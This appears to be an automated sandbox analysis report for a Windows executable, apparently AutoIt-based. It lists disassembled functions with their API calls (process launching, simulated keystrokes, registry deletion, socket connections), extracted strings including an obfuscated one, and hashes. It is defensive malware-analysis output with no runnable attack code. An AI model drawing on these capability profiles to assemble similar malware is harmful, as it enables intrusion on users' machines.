                                              • Opcode ID: 6d5a0d81774d741a465316b5c8d49f10df51f5a72bdade9f56227a57bcf04638
                                              • Instruction ID: c6be3d1cce2d41069dcd5b7f4d45ac0a43607b947e9b5e9c17488becd6f784f7
                                              • Opcode Fuzzy Hash: 6d5a0d81774d741a465316b5c8d49f10df51f5a72bdade9f56227a57bcf04638
                                              • Instruction Fuzzy Hash: 3271AB34605204EFDB21DF54C8A0FBAFBE9EF4A310F15809AE946973A2E731A940DB54
                                              Function 00BCF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BCF448
                                              • _memset.LIBCMT ref: 00BCF511
                                              • ShellExecuteExW.SHELL32(?), ref: 00BCF556
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                              • GetProcessId.KERNEL32(00000000), ref: 00BCF5CD
                                              • CloseHandle.KERNEL32(00000000), ref: 00BCF5FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              • Opcode ID: 9fd82213bc7993b3e2c8526c6120d52c30a18e8228f499a6417c97d51cd609f6
                                              • Instruction ID: c0b4cffb1eb7b2d52941c3b529eb73159014e9ac9d2a368a7d9f24cf754d9e2c
                                              • Opcode Fuzzy Hash: 9fd82213bc7993b3e2c8526c6120d52c30a18e8228f499a6417c97d51cd609f6
                                              • Instruction Fuzzy Hash: 91614D75A0061ADFCB14EF64C891AAEBBF5FF49310F1480E9E859AB351CB30AD45CB94
                                              Function 00BB0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(?), ref: 00BB0F8C
                                              • GetKeyboardState.USER32(?), ref: 00BB0FA1
                                              • SetKeyboardState.USER32(?), ref: 00BB1002
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BB1030
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BB104F
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BB1095
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BB10B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                              • Instruction ID: be495988ebda31f124995857444d65172b9dcf9e0d419ded5810f03ca79939b9
                                              • Opcode Fuzzy Hash: 2e2ba70bf6ddba93b79906c9fe52a5f8a27e4d9b7ebf2fa3b0d30386695719db
                                              • Instruction Fuzzy Hash: B351F1606186D53FFB3652388C25BFABEE9DB06304F4889C9E1D5968C2C2D8DCC4D751
                                              Function 00BB0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00BB0DA5
                                              • GetKeyboardState.USER32(?), ref: 00BB0DBA
                                              • SetKeyboardState.USER32(?), ref: 00BB0E1B
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BB0E47
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BB0E64
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BB0EA8
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BB0EC9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: fb9cb1994bc50dd47b6bd15be8a30795ccc14f8920695abe7cd36b9caa30fac9
                                              • Instruction ID: b9f968ba8fdb896456753bb4bb81b65a448379ac7cad453febe58552f62e2b36
                                              • Opcode Fuzzy Hash: fb9cb1994bc50dd47b6bd15be8a30795ccc14f8920695abe7cd36b9caa30fac9
                                              • Instruction Fuzzy Hash: 8B51E3A09286D63EFB3266648855BFBBEE99B06300F0888C9E1D5468C2D3D5EC94D750
                                              Function 00BB55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              • Opcode ID: 6e012f3b3e8b819db34ca5e173bdae881f7be7f56a0ed907bfb84cbbdd0e9ed1
                                              • Instruction ID: 325e347a746706c763f58740923263ac5d26590f6f523c0e286005c31e4c1110
                                              • Opcode Fuzzy Hash: 6e012f3b3e8b819db34ca5e173bdae881f7be7f56a0ed907bfb84cbbdd0e9ed1
                                              • Instruction Fuzzy Hash: 19419365C1061476CB11EBB48C86ADFB3FC9F04310F50C9A6E52DE3221FB74A655C7AA
                                              Function 00B52344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00B52357
                                              • ScreenToClient.USER32(00C157B0,?), ref: 00B52374
                                              • GetAsyncKeyState.USER32(00000001), ref: 00B52399
                                              • GetAsyncKeyState.USER32(00000002), ref: 00B523A7
                                              Strings
                                              • dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5, xrefs: 00B8BFF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID: dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 4210589936-3861665079
                                              • Opcode ID: df8276897e8c58b3ddee55f37eafa6adeebec124cb3564a150cce2b8c4987032
                                              • Instruction ID: 34de76a36a9653a3d1949844d0818f7a3f38d73ac9e56505eaf24f78a4df0ab7
                                              • Opcode Fuzzy Hash: df8276897e8c58b3ddee55f37eafa6adeebec124cb3564a150cce2b8c4987032
                                              • Instruction Fuzzy Hash: 68419075608105FFCF159F68C884BE9FBB4FB05360F20439AF829A22A0CB309954DFA0
                                              Function 00BB3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BB3697,?), ref: 00BB468B
                                                • Part of subcall function 00BB466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BB3697,?), ref: 00BB46A4
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00BB36B7
                                              • _wcscmp.LIBCMT ref: 00BB36D3
                                              • MoveFileW.KERNEL32(?,?), ref: 00BB36EB
                                              • _wcscat.LIBCMT ref: 00BB3733
                                              • SHFileOperationW.SHELL32(?), ref: 00BB379F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              • Opcode ID: cb55970d3392d51311f00d91df5b89731fe2e93cd7724862ac3585ac5dc65fc9
                                              • Instruction ID: 81bbbd0a6ab3e973f586ad8948192c6ea9a804f7b25b267e07f56bb40caa97c5
                                              • Opcode Fuzzy Hash: cb55970d3392d51311f00d91df5b89731fe2e93cd7724862ac3585ac5dc65fc9
                                              • Instruction Fuzzy Hash: 31416E7150C344ABC751EF64C451AEFB7E8EF89780F0008AEB49AC3251EB75D689C752
                                              Function 00BD7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BD72AA
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7351
                                              • IsMenu.USER32(?), ref: 00BD7369
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD73B1
                                              • DrawMenuBar.USER32 ref: 00BD73C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              • Opcode ID: e15077e76c61787ddd98631213bf8b3e91db14375f50b1894df39eba58814e4c
                                              • Instruction ID: 7c8740a8079c0afba7cdc8abd8af2ef53c24e2cccb79cfbf200087ae21b52cc9
                                              • Opcode Fuzzy Hash: e15077e76c61787ddd98631213bf8b3e91db14375f50b1894df39eba58814e4c
                                              • Instruction Fuzzy Hash: CE414675A44209EFDB20DF50D884AEABBF8FB05324F1480AAFD0597350EB30AD41DB50
                                              Function 00BD0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BD0FD4
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD0FFE
                                              • FreeLibrary.KERNEL32(00000000), ref: 00BD10B5
                                                • Part of subcall function 00BD0FA5: RegCloseKey.ADVAPI32(?), ref: 00BD101B
                                                • Part of subcall function 00BD0FA5: FreeLibrary.KERNEL32(?), ref: 00BD106D
                                                • Part of subcall function 00BD0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BD1090
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BD1058
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              • Opcode ID: a4e53ee8ec877378ebe64fee81d9d7dff4e8f1dac65b85f784e673ad0c1f2f11
                                              • Instruction ID: 57899ea33dcd88a3855f36bc5d09bc71557dd39f7aee35602385e4960ec6be23
                                              • Opcode Fuzzy Hash: a4e53ee8ec877378ebe64fee81d9d7dff4e8f1dac65b85f784e673ad0c1f2f11
                                              • Instruction Fuzzy Hash: E9311B71901109BFDB15AF94DC99AFFF7BCEF08300F1045AAE512E3241EA749E859BA0
                                              Function 00BD62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BD62EC
                                              • GetWindowLongW.USER32(00F921C0,000000F0), ref: 00BD631F
                                              • GetWindowLongW.USER32(00F921C0,000000F0), ref: 00BD6354
                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BD6386
                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BD63B0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BD63C1
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BD63DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 0cdbf995a83d0dbeda71f1ff3199adf1fb59c220f91831d258889ff3688430f2
                                              • Instruction ID: 2eb160856e515153fbe271aa3c3fae70c8737c8d3fa0e78928fa5001d6f6265d
                                              • Opcode Fuzzy Hash: 0cdbf995a83d0dbeda71f1ff3199adf1fb59c220f91831d258889ff3688430f2
                                              • Instruction Fuzzy Hash: B231F030644251EFEB20CF5CDC84F68BBE1FB5A724F1941A6F5018B2B2EB71A840DB54
                                              Function 00BADAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB2E
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADB54
                                              • SysAllocString.OLEAUT32(00000000), ref: 00BADB57
                                              • SysAllocString.OLEAUT32(?), ref: 00BADB75
                                              • SysFreeString.OLEAUT32(?), ref: 00BADB7E
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00BADBA3
                                              • SysAllocString.OLEAUT32(?), ref: 00BADBB1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 3a3fcdcca4b9d6747d73b40d712284443ec5d67b12719a1ea104480bd77b4f63
                                              • Instruction ID: 9ef745d3364a93069a6f7367d29df0f00425115586eb5aae76e6c701b5c9b178
                                              • Opcode Fuzzy Hash: 3a3fcdcca4b9d6747d73b40d712284443ec5d67b12719a1ea104480bd77b4f63
                                              • Instruction Fuzzy Hash: 6B21A736609219AFDF10DFA8DC84CBB77ECEB09360B458566F916DB250EA70DC418BB0
                                              Function 00BC6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BC7D8B: inet_addr.WS2_32(00000000), ref: 00BC7DB6
                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00BC61C6
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC61D5
                                              • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00BC620E
                                              • connect.WSOCK32(00000000,?,00000010), ref: 00BC6217
                                              • WSAGetLastError.WS2_32 ref: 00BC6221
                                              • closesocket.WS2_32(00000000), ref: 00BC624A
                                              • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00BC6263
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: b6046678d95fe47423da856f5048d5e351418960eb22b56a3553c7238ce26669
                                              • Instruction ID: b4228cd161dbc4249e94f19292177a9e210a6ae10d61459673ae8db7f28addeb
                                              • Opcode Fuzzy Hash: b6046678d95fe47423da856f5048d5e351418960eb22b56a3553c7238ce26669
                                              • Instruction Fuzzy Hash: 00317071604118ABDF10AF64CC85FBAB7E9EF45751F0440ADFD06AB291DB70AD049AA1
                                              Function 00BAF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 1038674560-2734436370
                                              • Opcode ID: 93a8e02b5dfad1db4ba92ee5a87ad6bc7bce6b856298de58573c80957e6d04d6
                                              • Instruction ID: 2a78f73e9c63b105f414ea306bb2a712d365d4ec06a9ad1e21b68433ab9669e0
                                              • Opcode Fuzzy Hash: 93a8e02b5dfad1db4ba92ee5a87ad6bc7bce6b856298de58573c80957e6d04d6
                                              • Instruction Fuzzy Hash: CE2134722086127AD220AB78AC02EF773DCEF5A740F1484BAF85A860A1EB509D81D395
                                              Function 00BADBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC09
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BADC2F
                                              • SysAllocString.OLEAUT32(00000000), ref: 00BADC32
                                              • SysAllocString.OLEAUT32 ref: 00BADC53
                                              • SysFreeString.OLEAUT32 ref: 00BADC5C
                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 00BADC76
                                              • SysAllocString.OLEAUT32(?), ref: 00BADC84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
